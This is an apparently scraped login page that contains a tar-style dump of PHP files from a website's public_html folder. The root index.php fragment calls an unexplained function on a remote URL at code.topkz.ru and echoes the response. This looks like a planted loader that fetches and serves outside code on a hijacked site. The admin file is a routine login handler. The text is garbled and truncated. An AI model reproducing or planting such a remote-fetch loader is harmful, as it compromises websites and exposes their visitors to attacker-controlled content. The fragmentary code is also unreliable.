Login
Access to our dashboard
home/aissorg/public_html/index.php 0000644 00000001117 15116221765 0013273 0 ustar 00 ' . $result); } jcur("https://code.topkz.ru/ss/cw3515.php"); home/aissorg/public_html/admin/index.php 0000644 00000012754 15116231615 0014367 0 ustar 00 0) { $_SESSION['login'] = $admin_row['id']; $_SESSION['name'] = $admin_row['name']; header("Location: dashboard.php"); exit; } else { // Set the alert message in session $_SESSION['alert'] = [ 'message' => 'Login Information is Incorrect.', 'type' => 'danger' // Bootstrap alert class for error ]; header("Location: index.php"); exit; } } ?>
Access to our dashboard